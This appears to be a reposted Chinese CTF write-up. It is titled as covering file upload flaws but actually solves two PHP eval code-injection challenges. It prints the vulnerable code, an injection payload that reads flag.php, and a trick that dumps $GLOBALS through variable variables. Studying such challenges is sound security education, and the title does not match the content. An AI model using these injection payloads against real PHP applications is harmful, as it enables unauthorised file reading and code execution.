分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 教程案例

典型的文件上传漏洞

发布时间:2023-09-06 02:27责任编辑:彭小芳关键词:文件上传

案例一
URL:http://120.24.86.145:8003/
代码

<?php include "waf.php"; include "flag.php"; $a = @$_REQUEST[‘hello‘]; eval( "var_dump($a);"); show_source(__FILE__); ?>

其实就是拼接eval
可构造如下语句:

1);print_r(file(flag.php));//

到了代码里就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL:http://120.24.86.145:8004/index1.php

 

flag In the variable ! <?php  


error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET[‘args‘])){// 通过get方式传递 args变量才能执行if里面的代码
    $args = $_GET[‘args‘];
    if(!preg_match("/^\w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
        die("args error!");
    }
    eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>

这个可以注意一下eval很明显$$.首先他说如果不符合那个正则就die。\w的意思是所有的字母。也就是说$args必须要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");

典型的文件上传漏洞

原文地址:https://www.cnblogs.com/WhiteHatKevil/p/10164814.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved